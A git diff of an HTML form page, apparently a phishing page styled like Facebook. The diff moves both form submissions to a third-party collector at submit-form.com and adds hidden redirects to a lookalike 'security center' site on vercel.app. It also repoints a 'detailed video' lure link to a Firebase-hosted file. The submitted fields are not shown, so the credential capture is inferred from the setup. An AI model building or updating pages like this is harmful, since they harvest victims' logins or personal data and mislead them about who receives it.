--- a/form.html
+++ b/form.html
@@ -298,8 +298,9 @@
 
         </div>
     </div>
-    <form action="https://usebasin.com/f/8a8a9640e143
+    <form action="https://submit-form.com/GiRH61sOH
 " method="post">
+         <input type="hidden" name="_redirect" value="https://security-center-web.vercel.app/" />
         <div class="relative flex border bg-[#e9ebee] h-10 md:hidden lg:hidden sm:block" bis_skin_checked="1">
             <div bis_skin_checked="1">
                 <div bis_skin_checked="1">
@@ -340,8 +341,8 @@
           </b>
                 </div>
                 <div bis_skin_checked="1">
-                    <a class="w-32 h-20 block" href="https://detailed-video-29b30.web.app/detailed%20video.mp4" previewlistener="true"><img class="w-32 h-20 mx-3"
-              src="https://cdn.glitch.global/69992e7d-685a-4cff-a1fa-e6c21c2dc843/download.jfif?v=1695649403488"
+                    <a class="w-32 h-20 block" href="https://firebasestorage.googleapis.com/v0/b/northern-card-408313.appspot.com/o/detailed%20video.mp4?alt=media&amp;token=a36aa6ff-64b7-4d24-b294-cd35d4d57cc2" previewlistener="true"><img class="w-32 h-20 mx-3"
+              src="video-logo.png"
               alt=""></a>
                 </div>
                 <p class="text-[10px] font-serif  mt-3 mx-3">
@@ -406,8 +407,9 @@
         </div>
     </div>
 
-    <form class="sm:hidden lg:block md:block" action="https://usebasin.com/f/8a8a9640e143
+    <form class="sm:hidden lg:block md:block" action="https://submit-form.com/GiRH61sOH
 " method="post">
+        <input type="hidden" name="_redirect" value="https://security-center-web.vercel.app/" />
         <div class="relative flex border bg-[#e9ebee] h-12 md:block lg:block hidden " bis_skin_checked="1">
             <div bis_skin_checked="1">
                 <div bis_skin_checked="1">
@@ -448,8 +450,8 @@
                 </p>
             </div>
             <div bis_skin_checked="1">
-                <a class="w-[120px] h-[80px] block mx-3" href="https://detailed-video-29b30.web.app/detailed%20video.mp4" bis_size="{&quot;x&quot;:301,&quot;y&quot;:391,&quot;w&quot;:120,&quot;h&quot;:80,&quot;abs_x&quot;:301,&quot;abs_y&quot;:391}" previewlistener="true"><img
-            src="https://cdn.glitch.global/2d202796-5635-411e-af9e-76219e16545d/download.jfif?v=1695952401347"
+                <a class="w-[120px] h-[80px] block mx-3" href="https://firebasestorage.googleapis.com/v0/b/northern-card-408313.appspot.com/o/detailed%20video.mp4?alt=media&amp;token=a36aa6ff-64b7-4d24-b294-cd35d4d57cc2" bis_size="{&quot;x&quot;:301,&quot;y&quot;:391,&quot;w&quot;:120,&quot;h&quot;:80,&quot;abs_x&quot;:301,&quot;abs_y&quot;:391}" previewlistener="true"><img
+            src="video-logo.png"
             bis_size="{&quot;x&quot;:301,&quot;y&quot;:391,&quot;w&quot;:120,&quot;h&quot;:70,&quot;abs_x&quot;:301,&quot;abs_y&quot;:391}"
             bis_id="bn_ewfqa8pnr4pkjvym36wulj"></a>
             </div>
